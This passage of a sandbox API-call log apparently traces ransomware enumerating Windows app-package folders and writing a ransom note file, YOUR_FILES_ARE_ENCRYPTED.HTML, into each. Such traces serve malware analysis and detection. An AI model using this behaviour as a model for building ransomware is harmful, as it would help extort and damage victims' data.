"c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.398] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.399] CloseHandle (hObject=0x214) returned 1 [0115.399] GetProcessHeap () returned 0x600000 [0115.399] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.399] GetProcessHeap () returned 0x600000 [0115.399] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.399] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.399] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.400] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData") returned 97 [0115.400] GetProcessHeap () returned 0x600000 [0115.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.400] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData" [0115.400] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData\\*" [0115.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.400] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.400] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x270b6864, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x270b6864, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x270b6864, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 0 [0115.400] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.400] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.400] GetProcessHeap () returned 0x600000 [0115.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.401] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.402] CloseHandle (hObject=0x214) returned 1 [0115.402] GetProcessHeap () returned 0x600000 [0115.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.409] GetProcessHeap () returned 0x600000 [0115.409] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.409] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f25f67, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f25f67, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f25f67, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.412] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.412] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState") returned 93 [0115.413] GetProcessHeap () returned 0x600000 [0115.413] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.413] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState" [0115.413] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState\\*" [0115.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f25f67, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f25f67, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f25f67, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.415] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f25f67, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f25f67, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f25f67, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 1 [0115.415] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f25f67, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f25f67, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f25f67, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b70, dwReserved1=0x3187ac8, cFileName="..", cAlternateFileName="")) returned 0 [0115.417] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.417] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0115.417] GetProcessHeap () returned 0x600000 [0115.417] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.419] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.419] CloseHandle (hObject=0x32c) returned 1 [0115.420] GetProcessHeap () returned 0x600000 [0115.420] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.420] GetProcessHeap () returned 0x600000 [0115.420] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.420] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26f25f67, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26f25f67, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26f25f67, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.420] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.420] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0115.420] GetProcessHeap () returned 0x600000 [0115.420] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingSports_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingsports_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.421] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.422] CloseHandle (hObject=0x320) returned 1 [0115.422] GetProcessHeap () returned 0x600000 [0115.422] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.422] GetProcessHeap () returned 0x600000 [0115.422] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.423] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec095fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.BingWeather_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.BIN")) returned 1 [0115.423] StrStrIW (lpFirst="Microsoft.BingWeather_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.423] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe") returned 84 [0115.424] GetProcessHeap () returned 0x600000 [0115.424] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.424] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe" [0115.424] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\*" [0115.424] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec095fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.426] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec095fd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.426] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.426] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.426] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC") returned 87 [0115.426] GetProcessHeap () returned 0x600000 [0115.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.427] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC" [0115.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\*" [0115.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.429] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.429] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.429] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.429] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache") returned 97 [0115.429] GetProcessHeap () returned 0x600000 [0115.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.430] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache" [0115.430] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache\\*" [0115.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.430] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 1 [0115.430] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1728, dwReserved1=0x62ecf8, cFileName="..", cAlternateFileName="")) returned 0 [0115.430] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.431] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.431] GetProcessHeap () returned 0x600000 [0115.431] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.432] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.433] CloseHandle (hObject=0x324) returned 1 [0115.433] GetProcessHeap () returned 0x600000 [0115.433] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.433] GetProcessHeap () returned 0x600000 [0115.433] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.434] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c73b076, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c73b076, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c73b076, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.434] StrStrIW 